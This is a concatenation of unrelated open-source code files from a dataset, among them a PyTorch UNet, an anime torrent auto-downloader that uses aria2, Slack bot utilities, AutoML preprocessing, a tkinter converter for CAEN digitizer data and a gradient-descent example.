downsampler = nn.AvgPool2d(stride, stride)
elif downsample_mode == 'max':
downsampler = nn.MaxPool2d(stride, stride)
else:
assert False
stride = 1
padder = None
to_pad = (kernel_size - 1) // 2
if pad == 'reflection':
padder = nn.ReflectionPad2d(to_pad)
to_pad = 0
convolver = nn.Conv2d(in_f, out_f, kernel_size, stride, padding=to_pad, bias=bias)
layers = filter(lambda x: x is not None, [padder, convolver, downsampler])
return nn.Sequential(*layers)
class ListModule(nn.Module):
def __init__(self, *args):
super(ListModule,self).__init__()
idx = 0
for module in args:
self.add_module(str(idx), module)
idx += 1
def __getitem__(self, idx):
if idx >= len(self._modules):
raise IndexError('index {} is out of range'.format(idx))
if idx < 0:
idx = len(self) + idx
it = iter(self._modules.values())
for i in range(idx):
next(it)
return next(it)
def __iter__(self):
return iter(self._modules.values())
def __len__(self):
return len(self._modules)
def make_model(args):
return UNet(feature_scale=args.feature_scale, scale=args.scale)
class UNet(nn.Module):
def __init__(self, n_input_channels=1, n_output_channels=1, feature_scale=1, more_layers=0,
concat_x=False, upsample_model='deconv', pad='zero', norm_layer=nn.BatchNorm2d,
need_bias=True, scale=2):
super(UNet, self).__init__()
self.feature_scale = feature_scale
self.more_layers = more_layers
self.concat_x = concat_x
features = [64, 128, 256, 512, 1024]
features = [x // self.feature_scale for x in features]
self.start = unetConv2d(n_input_channels,
features[0] if not self.concat_x else features[0] - n_input_channels,
norm_layer, need_bias, pad)
self.down1 = unetDown(features[0], features[1] if not self.concat_x else features[1] - n_input_channels,
norm_layer, need_bias, pad)
self.down2 = unetDown(features[1], features[2] if not self.concat_x else features[2] - n_input_channels,
norm_layer, need_bias, pad)
self.down3 = unetDown(features[2], features[3] if not self.concat_x else features[3] - n_input_channels,
norm_layer, need_bias, pad)
self.down4 = unetDown(features[3], features[4] if not self.concat_x else features[4] - n_input_channels,
norm_layer, need_bias, pad)
# more downsampling layers
if more_layers > 0:
self.more_downs = [
unetDown(features[4], features[4] if not self.concat_x else features[4] - n_input_channels,
norm_layer, need_bias, pad) for i in range(self.more_layers)]
self.more_ups = [
unetUp(features[4], upsample_model, need_bias, pad,
same_num_feat=True) for i in range(self.more_layers)]
self.more_downs = ListModule(*self.more_downs)
self.more_ups = ListModule(*self.more_ups)
self.up4 = unetUp(features[3], upsample_model, need_bias, pad)
self.up3 = unetUp(features[2], upsample_model, need_bias, pad)
self.up2 = unetUp(features[1], upsample_model, need_bias, pad)
self.up1 = unetUp(features[0], upsample_model, need_bias, pad)
self.upend = common.Upsampler(common.default_conv, scale, features[0], act=False)
resblock = [common.ResBlock(
common.default_conv, features[0], 3, act=nn.ReLU(True), bn=True, res_scale=1
) for _ in range(3)]
self.resblock = nn.Sequential(*resblock)
self.final = conv(features[0], n_output_channels, 1, bias=need_bias, pad=pad)
self.final = nn.Sequential(self.final, nn.Sigmoid())
def forward(self, inputs):
# DownSample
downs = [inputs]
down = nn.AvgPool2d(2, 2)
for i in range(4 + self.more_layers):
downs.append(down(downs[-1]))
in64 = self.start(inputs)
if self.concat_x:
in64 = torch.cat([in64, downs[0]], 1)
down1 = self.down1(in64)
if self.concat_x:
down1 = torch.cat([down1, downs[1]], 1)
down2 = self.down2(down1)
if self.concat_x:
down2 = torch.cat([down2, downs[2]], 1)
down3 = self.down3(down2)
if self.concat_x:
down3 = torch.cat([down3, downs[3]], 1)
down4 = self.down4(down3)
if self.concat_x:
down4 = torch.cat([down4, downs[4]], 1)
if self.more_layers > 0:
prevs = [down4]
for kk, d in enumerate(self.more_downs):
out = d(prevs[-1])
if self.concat_x:
out = torch.cat([out, downs[kk + 5]], 1)
prevs.append(out)
up_ = self.more_ups[-1](prevs[-1], prevs[-2])
for idx in range(self.more_layers - 1):
l = self.more_ups[self.more_layers - idx - 2]
up_ = l(up_, prevs[self.more_layers - idx - 2])
else:
up_ = down4
up4 = self.up4(up_, down3)
up3 = self.up3(up4, down2)
up2 = self.up2(up3, down1)
up1 = self.up1(up2, in64)
output = self.upend(up1)
output = self.resblock(output)
return self.final(output)
class unetConv2d(nn.Module):
def __init__(self, in_size, out_size, norm_layer, need_bias, pad):
super(unetConv2d, self).__init__()
if norm_layer is not None:
self.conv1 = nn.Sequential(
conv(in_size, out_size, 3, bias=need_bias, pad=pad),
norm_layer(out_size),
nn.ReLU()
)
self.conv2 = nn.Sequential(
conv(out_size, out_size, 3, bias=need_bias, pad=pad),
norm_layer(out_size),
nn.ReLU()
)
else:
self.conv1 = nn.Sequential(
conv(in_size, out_size, 3, bias=need_bias, pad=pad),
nn.ReLU()
)
self.conv2 = nn.Sequential(
conv(out_size, out_size, 3, bias=need_bias, pad=pad),
nn.ReLU()
)
def forward(self, inputs):
outputs = self.conv1(inputs)
outputs = self.conv2(outputs)
return outputs
class unetDown(nn.Module):
def __init__(self, in_size, out_size, norm_layer, need_bias, pad):
super(unetDown, self).__init__()
self.conv = unetConv2d(in_size, out_size, norm_layer, need_bias, pad)
self.down = nn.MaxPool2d(2, 2)
def forward(self, inputs):
outputs = self.down(inputs)
outputs = self.conv(outputs)
return outputs
class unetUp(nn.Module):
def __init__(self, out_size, upsample_model, need_bias, pad, same_num_feat=False):
super(unetUp, self).__init__()
n_feat = out_size if same_num_feat else out_size * 2
if upsample_model == 'deconv':
self.up = nn.ConvTranspose2d(n_feat, out_size, 4, stride=2, padding=1)
self.conv = unetConv2d(out_size * 2, out_size, None, need_bias, pad)
elif upsample_model == 'bilinear' or upsample_model == 'nearest':
self.up = nn.Sequential(nn.Upsample(scale_factor=2, mode=upsample_model),
conv(n_feat, out_size, 3, bias=need_bias, pad=pad))
self.conv = unetConv2d(out_size * 2, out_size, None, need_bias, pad)
else:
assert False
def forward(self, inputs1, inputs2):
in1_up = self.up(inputs1)
if (inputs2.size(2) != in1_up.size(2)) or (inputs2.size(3) != in1_up.size(3)):
diff2 = (inputs2.size(2) - in1_up.size(2)) // 2
diff3 = (inputs2.size(3) - in1_up.size(3)) // 2
inputs2_ = inputs2[:, :, diff2 : diff2 + in1_up.size(2), diff3 : diff3 + in1_up.size(3)]
else:
inputs2_ = inputs2
output = self.conv(torch.cat([in1_up, inputs2_], 1))
return output
``` |
{
"source": "jintaos2/Anime-Crawler",
"score": 2
} |
#### File: Anime-Crawler/live_update/subscribe.py
```python
import re
import os
import xmlrpc.client
import json
import logs
import traceback
class Subscribe:
"""rules
[{
"dir": "平稳世代的韦驮天们",
"title": [ "平稳世代的韦驮天们|Heion Sedai no Idaten", "動畫" ],
"title_optional": [ "简|CHS|GB", "简|CHS|GB|繁|CHT|BIG5", "1080|2160" ],
"epsode_filter": "[^a-zA-Z0-9](\\d\\d)[^a-zA-Z0-9]",
"order": 0,
"status": "active",
"epsodes": [ "12", "13" ]
}]
"""
def __init__(self, list_file:str, cache_dir:str, sources:list, aria2_url:str, aria2_dir:str):
self.list_file = list_file # './log/mylist.json'
self.cache_dir = cache_dir # './log/cache/'
self.sources = sources # ['dmhy','dmhy2']
self.aria2_url = aria2_url # "http://127.0.0.1:6800/rpc"
self.aria2_dir = aria2_dir # "E:/anime"
self.items = [] # new items
self.rules = [] # new rules
def download(self):
self.read_rules() # old rules
self.read_history(10) # cached items
self.n_new = 0 # number of new matched items
for rule in self.rules:
curr_rule = Rule(rule)
results = {} # {epsode: [(score, link, dir, title), (score, link, dir, title)]}
for item in self.items: # [release_time, release_type, release_title, release_magnet,release_size]
epsode, score = curr_rule.match(item)
if epsode == -1: continue
if epsode not in results: results[epsode] = []
results[epsode].append((score, item[3], rule["dir"], item[2])) # item match!
for epsode, results_per_epsode in results.items(): # download per epsode
results_per_epsode.sort(key = lambda x: x[0], reverse=True)
idx = rule["order"]
idx = idx if idx < len(results_per_epsode) else -1
if self.download_item(results_per_epsode[idx]): # download by order
curr_rule.delete(epsode) # delete downloaded epsode
curr_rule.store() # store remaining episodes back into the rule
logs.error_logger.info(f"[new] {self.n_new} items match the rule")
if self.n_new > 0:
logs.update_logger.info("----------------------------")
self.write_rules()
# (score, link, dir, title)
def download_item(self,item):
self.n_new += 1
_, link, subdir, title = item
logs.update_logger.info(f"[new] {title}")
try:
s = xmlrpc.client.ServerProxy(self.aria2_url)
id_ = s.aria2.addUri([link],{'dir': self.aria2_dir + subdir})
aria_status = s.aria2.tellStatus(id_)
logs.update_logger.info(f"[download] {title} dir:{aria_status['dir']}")
logs.error_logger.info(f"[download] {title} dir:{aria_status['dir']}")
return True
except Exception as e:
logs.error_logger.info(f"[aria2 error] port={self.aria2_url}, will try again]")
logs.error_logger.info(traceback.format_exc(limit=1))
return False
def read_rules(self):
try:
with open(self.list_file, 'r', encoding='utf8') as f:
self.rules = json.load(f)
except Exception as e:
logs.error_logger.info(f"[error] read_rules: {e}")
def write_rules(self):
try:
with open(self.list_file, 'w+', encoding='utf8') as f:
json.dump(self.rules, f, indent=2, ensure_ascii=False)
except Exception as e:
logs.error_logger.info(f"[error] write_rules: {e}")
def read_history(self, days:int):
filepaths: list = []
for name in self.sources:
cache = self.cache_dir + name + '/'
filepaths += [cache+i for i in sorted(os.listdir(cache), reverse=True) if len(i)==14][0:days]
self.items = []
for filepath in filepaths:
valid = []
with open(filepath, 'r', encoding='utf-8') as f:
lines = [i.split(',') for i in f.readlines() if i != '\n']
for i in lines:
if len(i) < 4: continue
if len(i) > 5: logs.error_logger.info(f'[read cache] unexpected items: {i}')
magnet = i[3]
if magnet[:8] == 'magnet:?': valid.append(i)
self.items += valid
return self.items
class Rule():
def __init__(self, rules:dict):
self.rules = rules
self.title_must = [re.compile(i, re.I) for i in rules["title"]] # ["进击的巨人|進擊的巨|Shingeki no Kyojin", "動畫"]
if "title_optional" not in rules:
self.title_optional = [ "简|CHS|GB", "1080|2160"]
else:
self.title_optional = rules["title_optional"]
self.title_optional = [re.compile(i, re.I) for i in self.title_optional]
self.epsode_filter = re.compile(r'[^a-zA-Z0-9](\d\d)[^a-zA-Z0-9]') # "[^a-zA-Z0-9](\\d\\d)[^a-zA-Z0-9]"
self.epsodes:set = self.epsode_str2int(rules["epsodes"] )
def epsode_str2int(self,a:list) -> set: # ["01", "02", "003-08"] -> [1,2,3,4,5,6,7,8]
ret: list = []
for i in a:
ii = i.split('-')
if len(ii) == 1:
ret.append(int(i))
elif len(ii) == 2:
ret += list(range(int(ii[0]),int(ii[1])+1))
return set(ret)
def epsode_int2str(self,a:set) -> list: # {1,2,3,5,6,7,8} -> ["01-03", "05-08"]
def subset(a:list) -> str:
'''pop ints from a, return str
'''
start = a.pop()
end = start
while end + 1 in a:
end = a.pop()
if start == end:
return str(end)
else:
return str(start) + '-' + str(end)
ret = []
a = list(a)
a.sort(reverse=True)
while a:
ret.append(subset(a))
return ret
def match(self, item: list):
"""
input: [release_time, release_type, release_title, release_magnet,release_size]
output:
epsode: -1 means no match
score
"""
title = item[1] + item[2]
for regex in self.title_must:
if not regex.search(title):
return -1, 0 # title not match
epsode_ = self.epsode_filter.findall(title)
if len(epsode_) > 0 and re.match(r'\d+', epsode_[-1]):
epsode = int(epsode_[-1])
if epsode not in self.epsodes:
return -1, 0 # epsode not match
else:
logs.error_logger.info(f"[error filter epsode] {title}")
return -1, 0
score = 0
for regex in self.title_optional:
if regex.search(title):
score += 1
return epsode, score
def delete(self, epsode:int):
self.epsodes.remove(epsode)
def store(self):
self.rules["epsodes"] = self.epsode_int2str(self.epsodes)
``` |
{
"source": "jinthagerman/bga_slack",
"score": 3
} |
#### File: bga_slack/src/bga_agricola.py
```python
import math
def is_harvest_round(progress):
progress_number = int(progress)
progress_per_round = 100/14
harvest_rounds = [4, 7, 9, 11, 13, 14]
for harvest_round in harvest_rounds:
abs_progress = progress_per_round * harvest_round
if math.floor(abs_progress) == progress_number or math.ceil(abs_progress) == progress_number:
return True
return False
```
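An illustrative check of `is_harvest_round` (a sketch, not part of the repository; the import path is assumed): it maps BGA's 0-100 progress value onto Agricola's 14 rounds and flags the harvest rounds.
```python
# Sketch only; assumes is_harvest_round from src/bga_agricola.py above is importable like this.
from bga_agricola import is_harvest_round

harvest_progress = [p for p in range(101) if is_harvest_round(p)]
print(harvest_progress)  # [28, 29, 50, 64, 65, 78, 79, 92, 93, 100]
```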
#### File: bga_slack/src/utils.py
```python
from urllib.parse import urlparse
import re
import random
import logging
from logging.handlers import RotatingFileHandler
logging.getLogger("slack").setLevel(logging.WARN)
LOG_FILENAME = "errs"
logger = logging.getLogger(__name__)
handler = RotatingFileHandler(LOG_FILENAME, maxBytes=10000000, backupCount=0)
formatter = logging.Formatter("%(asctime)s | %(name)s | %(levelname)s | %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
# Via https://stackoverflow.com/questions/7160737/how-to-validate-a-url-in-python-malformed-or-not
def is_url(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc])
except ValueError:
return False
def saveListToFile(list, filename):
with open(filename, "w") as text_file:
for item in list:
text_file.write(item + '\n')
def readListFromFile(filename):
try:
with open(filename, "r") as text_file:
return text_file.read().splitlines()
except FileNotFoundError:
return []
def pickRandomMessage(ADDITIONAL_MESSAGES):
RANDOM_MESSAGES_FILENAME = "random_messages"
additional_messages = readListFromFile(RANDOM_MESSAGES_FILENAME)
logger.debug(f'{len(additional_messages)} messages left in {RANDOM_MESSAGES_FILENAME}')
if len(additional_messages) == 0:
logger.debug(f'Repopulating {RANDOM_MESSAGES_FILENAME} with responses')
random.shuffle(ADDITIONAL_MESSAGES)
additional_messages = ADDITIONAL_MESSAGES
additional_message = additional_messages.pop(0)
saveListToFile(additional_messages, RANDOM_MESSAGES_FILENAME)
return additional_message
def reset_context(contexts, author):
"""End the current interactive session by deleting info about it."""
contexts[author] = {}
async def send_help(message, help_type):
"""Send the user a help message from a file"""
filename = "src/docs/" + help_type + "_msg.md"
with open(filename) as f:
text = f.read()
remainder = text.replace(4 * " ", "\t")
await send_message_partials(message.author, remainder)
async def send_message_partials(destination, remainder):
# Loop over text and send message parts from the remainder until remainder is no more
while len(remainder) > 0:
chars_per_msg = 2000
if len(remainder) < chars_per_msg:
chars_per_msg = len(remainder)
msg_part = remainder[:chars_per_msg]
remainder = remainder[chars_per_msg:]
# Only break on newline
if len(remainder) > 0:
while remainder[0] != "\n":
remainder = msg_part[-1] + remainder
msg_part = msg_part[:-1]
# Discord will delete whitespace before a message
# so preserve that whitespace by inserting a character
while remainder[0] == "\n":
remainder = remainder[1:]
if remainder[0] == "\t":
remainder = ". " + remainder[1:]
await destination.send(msg_part)
def normalize_name(game_name):
return re.sub("[^a-z0-7]+", "", game_name.lower())
def force_double_quotes(string):
# People from other countries keep on using strange quotes because of their phone's keyboard
# Force double quotes so shlex parses correctly
all_quotes = "'‹›«»‘’‚“”„′″「」﹁﹂『』﹃﹄《》〈〉"
return re.sub("[" + all_quotes + "]", '"', string)
``` |
{
"source": "JintingZhang/AUTOML",
"score": 3
} |
#### File: starting_kit/code_submission/preprocess.py
```python
import datetime
import pandas as pd
import numpy as np
from multiprocessing import Pool
import CONSTANT
from util import log, timeit
uni_ops = {
CONSTANT.TIME_PREFIX: {
'week': lambda df: df.dt.week,
'year': lambda df: df.dt.year,
'month': lambda df: df.dt.month,
'day': lambda df: df.dt.day,
'hour': lambda df: df.dt.hour,
# 'minute': lambda df: df.dt.minute,
'dayofweek': lambda df: df.dt.dayofweek,
'dayofyear': lambda df: df.dt.dayofyear,
},
}
@timeit
def compress_df(df, info, num=True, cat=True):
schema = info['schema']
if num:
num_cols = [col for col, types in schema.items() if types == 'num']
if len(num_cols) > 0:
df[num_cols] = df[num_cols].astype('float32')
if cat:
cat_cols = [col for col, types in schema.items() if types == 'str']
if len(cat_cols) > 0:
df[cat_cols] = df[cat_cols].astype('category')
@timeit
def parallelize_apply(func, df, cols):
num_threads=4
pool = Pool(processes=num_threads)
col_num = int(np.ceil(len(cols) / num_threads))
res1 = pool.apply_async(func, args=(df,cols[:col_num]))
res2 = pool.apply_async(func, args=(df,cols[col_num:2 * col_num]))
res3 = pool.apply_async(func, args=(df,cols[2 * col_num:3 * col_num]))
res4 = pool.apply_async(func, args=(df,cols[3 * col_num:]))
pool.close()
pool.join()
df = pd.concat([df,res1.get(),res2.get(),res3.get(),res4.get()],axis=1)
return df
@timeit
def normal_apply(func, df, cols):
return pd.concat([df, func(df, cols)], axis=1)
@timeit
def clean_tables(df,info):
schema = info['schema']
num_cols = [col for col, types in schema.items() if types == 'num']
# cat_cols = [c for c in df if c.startswith(CONSTANT.CATEGORY_PREFIX)]
m_cat_cols = [col for col, types in schema.items() if types == 'str']
time_cols = [col for col, types in schema.items() if types == 'timestamp']
fillna(df,info)
if len(m_cat_cols) > 3:
df = parallelize_apply(count_m_cat, df, m_cat_cols)
elif len(m_cat_cols) > 0:
df = normal_apply(count_m_cat, df, m_cat_cols)
if len(time_cols) > 0:
df = normal_apply(transform_datetime, df, time_cols)
# drop columns
df.drop(m_cat_cols+time_cols, axis=1, inplace=True)
#compress_df(df,info)
@timeit
def clean_df(df,info):
#compress_df(df,info, num=False)
#df_fillna_with_mean(df,info)
hash_cat(df,info)
return df
def get_dtype (df):
for col in df:
# get dtype for column
dt = df[col].dtype
return dt
@timeit
def fillna(df,info):
schema = info['schema']
#num_cols = [col for col, types in schema.items() if types == 'num']
# cat_cols = [c for c in df if c.startswith(CONSTANT.CATEGORY_PREFIX)]
m_cat_cols = [col for col, types in schema.items() if types == 'str']
time_cols = [col for col, types in schema.items() if types == 'timestamp']
#for c in [num_cols]:
# df[c].fillna(-1, inplace=True)
for c in [m_cat_cols]:
df[c].fillna("0", inplace=True)
for c in [time_cols]:
df[c].fillna(datetime.datetime(1970, 1, 1), inplace=True)
@timeit
def df_fillna_with_mean(df,info):
schema = info['schema']
#for c in [col for col, types in schema.items() if types == 'num']:
# df[c].fillna(df[c].mean(), inplace=True)
for c in [col for col, types in schema.items() if types == 'timestamp']:
mean = pd.to_timedelta(df[c]).mean() + pd.Timestamp(0)
df[c].fillna(mean, inplace=True)
for c in [col for col, types in schema.items() if types == 'str']:
df[c].fillna("0", inplace=True)
@timeit
def feature_engineer(df, config):
return df
def count_cat(df, cat_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
prefix_c = CONSTANT.CATEGORY_PREFIX
op = "frequency"
new_df=pd.DataFrame()
for c in cat_cols:
dic = df[c].value_counts().to_dict()
new_df[f"{prefix_n}{op.upper()}({c})"] = df[c].apply(lambda x: dic[x])
return new_df
def hash_cat(df,info):
schema = info['schema']
for c in [col for col, types in schema.items() if types == 'str']:
df[c] = df[c].apply(lambda x: int(x))
def frequent_cat(x):
data = x.split(',')
item, freq = np.unique(data, return_counts=True)
return item[np.argmax(freq)]
def weighted_cat(dic):
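# returns a closure that, for a comma-separated multi-category string, picks the item maximizing global frequency (dic) times its local count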
def freq(x):
data = x.split(',')
item, freq = np.unique(data, return_counts=True)
global_freq = np.array([dic[i] for i in item])
return item[np.argmax(global_freq*freq)]
return freq
def count_m_cat(df,m_cat_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
prefix_c = CONSTANT.CATEGORY_PREFIX
op_l = 'length'
op_f = 'frequent_cat'
op_fw = 'frequent_weighted_cat'
new_df=pd.DataFrame()
for c in m_cat_cols:
new_df[f"{prefix_c}{op_f.upper()}RANK(1)({c})"] = df[c].apply(frequent_cat)
new_df[f"{prefix_n}{op_l.upper()}({c})"] = df[c].apply(lambda x: len(x.split(',')))
all_item = ','.join(df[c].values).split(',')
item, freq = np.unique(all_item, return_counts=True)
dic = dict(zip(item, freq))
new_df[f"{prefix_c}{op_fw.upper()}RANK(1)({c})"] = df[c].apply(weighted_cat(dic))
return new_df
def transform_datetime(df, time_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
ops = uni_ops[CONSTANT.TIME_PREFIX]
new_dfs = []
for c in time_cols:
new_df = df[c].agg(ops.values())
new_df.columns = [f"{prefix_n}{op.upper()}({c})" for op in ops]
new_dfs += [new_df]
return pd.concat(new_dfs, axis=1)
```
#### File: starting_kit/ingestion/common.py
```python
import logging
import importlib
import sys
class ModelApiError(Exception):
"""Model api error"""
def get_logger(verbosity_level, name, use_error_log=False):
"""Set logging format to something like:
2019-04-25 12:52:51,924 INFO score.py: <message>
"""
logger = logging.getLogger(name)
logging_level = getattr(logging, verbosity_level)
logger.setLevel(logging_level)
formatter = logging.Formatter(
fmt='%(asctime)s %(levelname)s %(filename)s: %(message)s')
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging_level)
stdout_handler.setFormatter(formatter)
logger.addHandler(stdout_handler)
if use_error_log:
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.WARNING)
stderr_handler.setFormatter(formatter)
logger.addHandler(stderr_handler)
logger.propagate = False
return logger
VERBOSITY_LEVEL = 'INFO'
LOGGER = get_logger(VERBOSITY_LEVEL, __file__)
def _check_umodel_methed(umodel):
# Check if the model has methods `train`, `predict`, `save`, `load`.
for attr in ['train', 'update', 'predict', 'save', 'load']:
if not hasattr(umodel, attr):
raise ModelApiError("Your model object doesn't have the method `%s`" % attr)
def import_umodel():
"""import user model"""
model_cls = importlib.import_module('model').Model
_check_umodel_methed(model_cls)
return model_cls
def init_usermodel(dataset):
"""initialize user model"""
return import_umodel()(
dataset.get_metadata(), dataset.get_test_timestamp(),
dataset.get_pred_timestamp())
``` |
{
"source": "jintonic/toward",
"score": 3
} |
#### File: jintonic/toward/b2r.py
```python
usage='''
Convert CAEN DAQ binary output file to ROOT format:
python3 b2r.py
'''
from tkinter import *
root=Tk(); root.resizable(0,0)
root.wm_title('Convert CAEN DAQ binary output to ROOT format (press q to quit)')
def quit_gui(event=None): root.quit(); root.destroy()
root.bind('q', quit_gui)
Label(root, text="Select run folder:").grid(column=0, row=0, sticky='nw')
rlist=Listbox(root, height=8,
# https://anzeljg.github.io/rin2/book2/2405/docs/tkinter/listbox.html
selectbackground='orchid', selectforeground='white',
# https://stackoverflow.com/a/48992537/1801749
exportselection=False)
rlist.grid(column=0, row=1, sticky='ew'); rlist.focus()
folders=[] # obtain a list of folders containing DAQ cfg files
from os import walk, system, path, listdir
for folder, subdirs, files in walk('.'):
if '.git' in subdirs: subdirs.remove('.git')
if 'share' in subdirs: subdirs.remove('share')
if 'WaveDumpConfig.txt' in files: folders.append(folder)
if 'settings.xml' in files: folders.append(folder)
folders.sort()
for folder in folders:
rlist.insert("end",folder)
if rlist.size()%2: rlist.itemconfig("end", bg='azure', fg='black')
rlist.selection_set(rlist.size()-1) # select the last run
rlist.see(rlist.size()-1) # scroll to the last run
Label(root, text="Select binary file:").grid(column=1, row=0, sticky='nw')
clist=Listbox(root,height=8,exportselection=False,
selectbackground='orchid',selectforeground='white')
clist.grid(column=1, row=1, sticky='ew')
Label(root, text="Existing ROOT files:").grid(column=2, row=0, sticky='nw')
flist=Listbox(root, height=8)
flist.grid(column=2, row=1, sticky='ew')
from subprocess import Popen
def call_show_py(event=None):
if rlist.size()==0 or flist.size()==0: return
run=rlist.get(rlist.curselection()[0]).replace('\\','/')
for folder, subdirs, files in walk(run):
if "RAW" in subdirs: run=run+"/RAW"
Popen(['python3', 'show.py', run])
show=Button(root, text='Show', command=call_show_py)
show.grid(column=2, row=2, sticky='se')
show.bind('<Return>', call_show_py)
root.bind('s', call_show_py)
def call_analyze_C(event=None):
if rlist.size()==0 or flist.size()==0: return
run=rlist.get(rlist.curselection()[0]).replace('\\','/')
for folder, subdirs, files in walk(run):
if "RAW" in subdirs: run=run+"/RAW"
Popen(['root', '-l', 'analyze.C("'+run+'")'])
ana=Button(root, text='Analyze', command=call_analyze_C)
ana.grid(column=2, row=2, sticky="sw")
ana.bind('<Return>', call_analyze_C)
root.bind('a', call_analyze_C)
Label(root, text="DAQ Configurations:").grid(column=0, row=2, sticky='sw')
text=Text(root, width=80, height=25)
text.grid(column=0, row=3, columnspan=3)
thr,polarity,nbase,ssize,bits=10,1,100,2,14
def parse_wavedump_cfg(run=''):
global thr, polarity, nbase, ssize, bits
with open(run+'/WaveDumpConfig.txt','r') as cfg:
for line in cfg:
if line=='': continue
if line[0]=='#': continue
part=line.split()
if len(part)==0: continue
if part[0]=='RECORD_LENGTH': nbase=int(int(part[1])*0.1)
if part[0]=='Threshold': thr=part[1]
if part[0]=='PULSE_POLARITY':
polarity=1 if part[1].lower()=='positive' else -1
if part[0]=='Digitizer':
if part[1]>'750': bits=10
elif part[1]>='740': bits=12
elif part[1]=='720': bits=12
else:
if part[1]=='721' or part[1]=='731': ssize=1
text.insert(INSERT,line)
import xml.etree.ElementTree as ET
def parse_compass_cfg(run=''):
tree = ET.parse(run+'/settings.xml'); cfg = tree.getroot()
daq = cfg.find('board').find('modelName').text
parameters = cfg.find('board').find('parameters')
global thr, polarity, nbase, ssize, bits
thr = parameters[8][1][0].text
polarity = 1 if parameters[4][1][0].text == 'POLARITY_POSITIVE' else -1
nbase = int(float(cfg.find('board').find('sampleTime').text)*0.1)
bits = cfg.find('board').find('adcBitCount').text
text.insert(INSERT,'digitizer: {}\nthreshold: {}\npolarity: {}'.format(
daq,thr,polarity))
def list_files_in(run=''):
clist.delete(0,'end'); flist.delete(0,'end')
for folders, subdirs, files in walk(run):
for file in files:
if file[-4:]==".dat": clist.insert("end",file) # WaveDump output
if file[-4:]==".bin": clist.insert("end",file) # CoMPASS output
if file[-4:]=="root": flist.insert("end",file)
if clist.size()%2: clist.itemconfig("end", bg='azure', fg='black')
clist.selection_set(0)
show['state']='normal' if flist.size()>0 else 'disabled'
ana['state']='normal' if flist.size()>0 else 'disabled'
def run_selected(event=None):
text.delete(1.0,'end')
run=rlist.get(rlist.curselection()[0])
for folder, subdirs, files in walk(run):
if 'WaveDumpConfig.txt' in files: parse_wavedump_cfg(run)
if 'settings.xml' in files: parse_compass_cfg(run)
list_files_in(run)
rlist.bind("<<ListboxSelect>>", run_selected)
run_selected()
def convert_file(event=None):
run=rlist.get(rlist.curselection()[0]).replace("\\","/")
file=clist.get(clist.curselection()[0])
ch=file[8:9] if file[-3:]=='bin' else file[4:5]
script='c2r.C' if file[-3:]=='bin' else 'w2r.C'
if file[-3:]=="bin": run=run+"/RAW"
argument='{}("{}","{}",{},{},{},{},{},{})'.format(
script,run,file,ch,thr,polarity,nbase,ssize,bits)
Popen(['root', '-b', '-q', argument]).wait()
list_files_in(run)
convert=Button(root, text='Convert', command=convert_file)
convert.grid(column=1,row=2)
convert.bind('<Return>', convert_file)
root.bind('c', convert_file)
# give focus to the GUI window in Mac
# https://stackoverflow.com/questions/17774859
from platform import system as platform
if platform() == 'Darwin': # How Mac OS X is identified by Python
system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
# If you put root.destroy() here, it will cause an error if the window is
# closed with the window manager.
root.mainloop()
``` |
{
"source": "jintrone/advice-reification",
"score": 3
} |
#### File: py/classifier/prediction.py
```python
import pandas as pd
import numpy as np
from sklearn import linear_model
class predictInfo:
def __init__(self):
p_train = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/provideinfo.csv', index_col = 0)
self.p_model = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
self.p_model.fit(p_train.iloc[:,0:-1], p_train.iloc[:,-1])
del(p_train)
print("Learned provide info model")
r_train = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/receivedinfo.csv', index_col = 0)
self.r_model = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
self.r_model.fit(r_train.iloc[:,0:-1], r_train.iloc[:,-1])
del(r_train)
print("Learned receive info model")
def processCorpus(self,corpus):
print("Predict %s"%(corpus))
topredict = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/%s.topredict.csv'%(corpus), index_col = 0)
p = self.p_model.predict(topredict)
r = self.r_model.predict(topredict)
out_p = pd.DataFrame(p,index=topredict.index.values, columns=['pi'])
out_r = pd.DataFrame(r,index=topredict.index.values, columns=['ri'])
final = out_p.join(out_r)
final.to_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/%s.labelled.csv'%(corpus))
def main():
corpora = ["anxiety_and_panic_disorders_exchange","bipolar_disorder_exchange","cancer_community","colorectal_cancer_exchange","depression_exchange","erectile_dysfunction_exchange","eye_health_community","food_and_cooking_exchange","gynecology_exchange","heart_disease_exchange","hypertension_and_high_blood_pressure_exchange","infertility_and_reproduction_exchange","knee_and_hip_replacement_exchange","lupus_exchange","mens_health_community","migraines_and_headaches_exchange","newborn_and_baby_exchange","oral_health_exchange","osteoarthritis_exchange","pet_health_exchange","pregnancy_exchange","prostate_cancer_exchange","raising_fit_kids_community","rheumatoid_arthritis_exchange","skin_and_beauty_exchange","skin_problems_and_treatments_exchange","sleep_disorders_exchange","smoking_cessation_exchange","sports_medicine_exchange","stroke_exchange","substance_abuse_exchange"]
p = predictInfo()
for corpus in corpora:
p.processCorpus(corpus)
if __name__ == "__main__":
main()
``` |
{
"source": "JintuZheng/Blog-",
"score": 3
} |
#### File: JintuZheng/Blog-/gradient.py
```python
from math import pi
import torch
import torch.optim
from debug import ptf_tensor, draw3D_func
# Example: compute the gradient at a given point
x=torch.tensor([pi/3,pi/6],requires_grad=True)
f = - ((x.cos() ** 2).sum()) ** 2
ptf_tensor(f)
f.backward() # compute the gradient
ptf_tensor(x.grad) # gradient at the point [pi/3, pi/6]
optimizer=torch.optim.SGD([x,],lr=0.1,momentum=0)
for step in range(20):
if step:
optimizer.zero_grad() # clear gradients from the previous iteration
f.backward() # compute gradients
optimizer.step() # update x[0], x[1]
f = - ((x.cos() ** 2).sum()) ** 2
print ('step {}: x = {}, f(x) = {}, grad = {}'.format(step, x.tolist(), f, x.grad))
# Example: optimizing the Himmelblau function
